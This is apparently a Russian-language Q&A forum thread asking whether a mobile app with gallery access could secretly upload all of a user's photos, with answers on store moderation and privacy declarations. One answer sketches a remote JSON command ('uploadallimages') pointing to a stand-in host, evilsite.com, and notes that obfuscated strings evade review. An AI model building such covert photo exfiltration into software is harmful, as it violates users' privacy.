petushok55
@petushok55
Обучаюсь на практике.

Может ли приложение, получив доступ к галерее, взять и отправить втихую все фотки себе на сервер?

что думаете по этому поводу?
если это технически возможно, то отследить можно только с помощью сниффера думаю, но думаю крупные компании таким не промышляют, потому что хоть один случай выявится, то репутации больно будет, а вот мелкие, или другие, которым пофиг
  • Вопрос задан
  • 742 просмотра
Пригласить эксперта
Ответы на вопрос 3
@pfg21
ex-турист
да. может. если есть дырка доступ значит есть доступ.
но гугл такие приложения активно отслеживает и банит.
Ответ написан
Комментировать
402d
@402d
начинал с бейсика на УКНЦ в 1988
Отправка фоток на сервер в фоне обычное поведение для любых сетевых дисков.
В этом нет ничего криминального. Остаётся разобраться с термином в тихую.
Фонарику такое нелогично. Явно троян.
Не давно ввели анкету о персональных данных. Фото туда попадают. Надо декларировать.

На сколько там жёстко именно с фото не в курсе.

Сам словил такое. Заявил что не собираю.
Летит отклонение на очередное обновление. Слышь там у тебя есть ввод телефона. Меняй анкету или убирай.

Мля . Модерации писать бесполезно. Никого не волнует, что это ввод для формирования куар кода. Через месяц обнули раздел . А обновы на Бет или частичное внедрение не проходят. Только фулл ролаут допустим. Блин у меня из-за такого развертывания 50 тысяч ошибку словили. Две недели срочные фиксы выпускал

Так я тому, что если в разделе написал, что фото передаешь на сервер, то можно хоть это будет не очевидно в самом приложении.
Ответ написан
Комментировать
firedragon
@firedragon
Не джун-мидл-сеньор, а трус-балбес-бывалый.
Хм предположим гипотетически что у приложения есть разрешения на галерею и интернет доступ.
Пусть оно обращается к серверу и получает json.
Пусть json выглядит примерно так:
"cmd": "uploadallimages",
"url": "https://evilsite.com/upload.php"


Никакая проверка не выявит ничего подозрительного, тем более что строки можно заменить цифрами.
Никакой сниффер кстати не поможет, будет только факт трафика по какому то адресу.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы